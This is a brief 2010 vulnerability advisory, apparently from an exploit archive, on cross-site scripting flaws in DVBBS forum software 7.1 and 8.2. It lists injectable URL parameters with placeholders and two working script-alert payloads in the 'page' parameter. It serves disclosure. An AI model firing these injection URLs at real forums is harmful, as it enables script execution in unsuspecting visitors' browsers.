DVBBS Multiple Cross Site Scripting Vulnerabilities
Posted on 08 March 2010
=================================================== DVBBS Multiple Cross Site Scripting Vulnerabilities =================================================== Remote: Yes Credit: lostmon is credited with the discovery of this vulnerability. Vulnerable: Dvbbs Dvbbs 8.2 Dvbbs Dvbbs 7.1 Sp2 Dvbbs Dvbbs 7.1 An attacker can exploit this issue by enticing an unsuspecting victim to follow a malicious URI. Examples have been provided: http://www.example.com/dispbbs.asp?boardID=8&ID=550194&page=1[XSS-CODE] http://www.example.com/dispuser.asp?name=Walltrapass[XSS-CODE] http://www.example.com/boardhelp.asp?boardid=0&act=2&title=[XSS-CODE] http://www.example.com/boardhelp.asp?boardid=0&view=faq[XSS-CODE]&act=3 http://www.example.com/boardhelp.asp?boardid=0&view=faq&act=3[XSS-CODE] http://www.example.com/boardhelp.asp?boardid=0&act=2[XSS-CODE]&title= http://www.example.com:80/dispbbs.asp?boardid=1&id=1&page="><script>alert(/liscker/);</script> http://www.example.com:80/forum1/list.asp?boardid=1&id=1&page=><script>alert(/liscker/);</script> # ~ - [ [ : Inj3ct0r : ] ]